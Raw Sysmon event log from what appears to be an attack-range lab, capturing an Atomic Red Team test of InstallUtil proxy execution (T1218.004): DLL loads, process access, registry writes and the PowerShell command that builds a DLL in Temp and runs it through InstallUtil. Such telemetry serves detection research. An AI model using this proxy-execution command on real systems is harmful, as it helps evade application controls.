734700x800000000000000057600109Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.140{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057600108Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.140{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057600107Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.140{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057600106Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.140{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=F9E249B6BB80C06BA30A61854567796C,SHA256=E5F62CD5D2FE7BE8D4E029ECA004A8773FF8D1F7AB92C115810AD54B5B8F50CAtrueMicrosoft WindowsValid 734700x800000000000000057600105Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.140{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll4.8.4180.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Execution EngineMicrosoft® .NET FrameworkMicrosoft Corporationmscoreei.dllMD5=899A8B655E52A061B33571D97C5C06ED,SHA256=DE05B03E37FB9BA5D74CF8FA36A6F0B15AB61705285B738BC90D14FDE580A45EtrueMicrosoft CorporationValid 734700x800000000000000057600104Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.124{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057600103Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.124{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057600102Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.124{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057600101Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.124{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000057600100Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.124{8B6011A9-C6FA-616E-9C35-01000000F101}41365516C:\Windows\system32\conhost.exe{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057600099Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.124{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057600098Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.124{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057600097Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.124{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\mscoree.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft .NET Runtime Execution EngineMicrosoft® Windows® Operating SystemMicrosoft Corporationmscoree.dllMD5=5ECE402D7E12EC3750D044BF3D878DF6,SHA256=3F02B1AE7B61BC36B04EA2B82ED79F112219F4E9668518030FF14B005E2C9BBCtrueMicrosoft WindowsValid 734700x800000000000000057600096Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.124{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057600095Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.124{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exeMD5=4F296B709C187304D4609C11FD2BDC03,SHA256=756E583FF1E00A5DB0A2BEE3849693920C4BDFBE87D8757834093372CD690C71trueMicrosoft CorporationValid 10341000x800000000000000057600094Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.124{8B6011A9-A45D-618E-C1FC-04000000F101}3487144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c01f5|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e32995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e327fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3ebb92d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e2aa82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+48fb304(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3df002a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e53a9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e3593c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e2665c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e62cff(wow64) 10341000x800000000000000057600093Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.124{8B6011A9-A45D-618E-C1FC-04000000F101}3487144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c3566|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e32995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e327fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3ebb92d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e2aa82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+48fb304(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3df002a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e53a9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e3593c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e2665c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e62cff(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e62987(wow64) 10341000x800000000000000057600092Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.124{8B6011A9-888A-6164-7000-00000000F101}34483876C:\Windows\system32\csrss.exe{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057600091Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.124{8B6011A9-A45D-618E-C1FC-04000000F101}3487144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e32995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e327fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3ebb92d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e2aa82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+48fb304(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3df002a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e53a9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e3593c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e2665c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e62cff(wow64) 154100x800000000000000057600090Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:29:02.124{8B6011A9-A45E-618E-C6FC-04000000F101}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe" /logfile= /logtoconsole=false /installtype=notransaction /action=uninstall C:\Users\ADMINI~1\AppData\Local\Temp\2\T1218.004.dll C:\Users\Administrator\AppData\Local\Temp\2\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=4F296B709C187304D4609C11FD2BDC03,SHA256=756E583FF1E00A5DB0A2BEE3849693920C4BDFBE87D8757834093372CD690C71{8B6011A9-A45D-618E-C1FC-04000000F101}348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly . C:\AtomicRedTeam\atomics\T1218.004\src\InstallUtilTestHarness.ps1 $InstallerAssemblyDir = \""$Env:TEMP\\"" $InstallerAssemblyFileName = \""T1218.004.dll\"" $InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName $CommandLine = \""/logfile= /logtoconsole=false /installtype=notransaction /action=uninstall `\""$InstallerAssemblyFullPath`\""\"" $ExpectedOutput = 'Constructor_Uninstall_' $TestArgs = @{ OutputAssemblyDirectory = $InstallerAssemblyDir OutputAssemblyFileName = $InstallerAssemblyFileName InvocationMethod = 'Executable' CommandLine = $CommandLine } $ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs if ($ActualOutput -ne $ExpectedOutput) { throw @\"" InstallUtil Uninstall method execution test failure. Installer assembly execution output did not match the expected output. Expected: $ExpectedOutput Actual: $ActualOutput \""@ }} 734700x800000000000000057604928Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.886{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\dhcpcsvc.dll10.0.14393.3930 (rs1_release.200901-1914)DHCP Client ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationdhcpcsvc.dllMD5=68C7867BEB2A710D14B70D96C4D7DE4E,SHA256=DA093049898D4608579C739B6A63DC98A3FBA57ABDDBFB94C48D2A8335BA0CBDtrueMicrosoft WindowsValid 734700x800000000000000057604908Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.886{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\dhcpcsvc6.dll10.0.14393.3930 (rs1_release.200901-1914)DHCPv6 ClientMicrosoft® Windows® Operating SystemMicrosoft Corporationdhcpcsvc6.dllMD5=48821439687840212B6457EDD266FA1C,SHA256=F3E9CC2B98D7E0CEBCFCC7906926E839436358437EF10E335CAF7FFAB9E13DC5trueMicrosoft WindowsValid 734700x800000000000000057604896Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.886{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=CDDE3316B3736A9613F31610AC137C9E,SHA256=545CD6206CC1CD22A7CE8B4845CFCE3E06AAD97D4334588A52F0F143CC8AD171trueMicrosoft WindowsValid 734700x800000000000000057604895Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.871{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=380F0481E3BA9EA699BB6F674A500745,SHA256=ED5F6D3E1F27292480800E540E5F60CF8E8A157B52AC47ACA8B81F57F63F30F0trueMicrosoft WindowsValid 734700x800000000000000057604894Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.871{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\OnDemandConnRouteHelper.dll10.0.14393.0 (rs1_release.160715-1616)On Demand Connctiond Route HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationOnDemandConnRouteHelper.dllMD5=DF275C9659ED8215695B572A8CE17FBC,SHA256=D8F3C962E828201B361A6F634412B7BE25EC1BD3F848F259E3C996BB9572B0FBtrueMicrosoft WindowsValid 734700x800000000000000057604893Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.871{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\winhttp.dll10.0.14393.4467 (rs1_release.210604-1844)Windows HTTP ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationwinhttp.dllMD5=F5FF215A5AE295644FE12BEAF6B75D00,SHA256=714EEB3B620CC9E368813728B1D247684519A3181211CDB5FCC37451F9BC2B96trueMicrosoft WindowsValid 13241300x800000000000000057604866Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:34:10.855{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS\FileDirectory%%windir%%\tracing 13241300x800000000000000057604865Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:34:10.855{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS\MaxFileSizeDWORD (0x00100000) 13241300x800000000000000057604864Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:34:10.855{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS\ConsoleTracingMaskDWORD (0xffff0000) 13241300x800000000000000057604863Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:34:10.855{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS\FileTracingMaskDWORD (0xffff0000) 13241300x800000000000000057604862Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 